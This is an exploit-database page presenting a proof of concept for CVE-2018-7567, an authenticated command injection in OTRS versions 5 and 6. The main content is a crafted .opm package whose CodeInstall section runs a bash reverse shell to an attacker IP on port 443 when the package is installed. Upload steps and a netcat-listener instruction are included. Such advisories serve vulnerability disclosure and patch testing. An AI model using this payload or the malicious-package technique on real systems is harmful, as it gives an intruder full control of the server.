[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OTRS Authenticated Command Injection Exploit

Author
Ali BawazeEer
Risk
[
Security Risk High
]
0day-ID
0day-ID-29938
Category
remote exploits
Date add
03-03-2018
CVE
CVE-2018-7567
Platform
multiple
# Exploit Title: OTRS Authenticated Command Injection  
# Exploit Author: Ali BawazeEer 
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7
# CVE : CVE-2018-7567

# Vulnerability Description: 
authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.
•	Proof opm file to upload 
---------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>
	<BuildDate>2016-09-23 11:17:41</BuildDate>
	<BuildHost>opms.otrs.com</BuildHost>
	<Framework>5.0.x</Framework>
	<IntroInstall Lang="en" Title="My Module" type="pre">
		<br>
		Hello wolrd
		<br>
		((Hello!))
		<br&gt
	</IntroInstall>
	<CodeInstall type="pre">
		print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);
	</CodeInstall>
	<CodeInstall Type="post">
		# create the package name
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};
		$Kernel::OM->Get($ModeModule)-%gt;CodeInstall();
	</CodeInstall>
	<CodeUninstall type="pre">
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
		$Kernel::OM->Get($CodeModule)->CodeUninstall();
	</CodeUninstall>
</otrs_package>

------------------------------------------------------


-	Steps:
-	Go to package manager from administrator panel 
-	Save the above code in opm file and upload it as package  
-	change the ip address to your attacking machine and setup netcat listener 


# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the server  after uploading malicious opm file 
# and thus have total control over the web server , 
#
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server 
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer

#  0day.today [2024-03-29]  #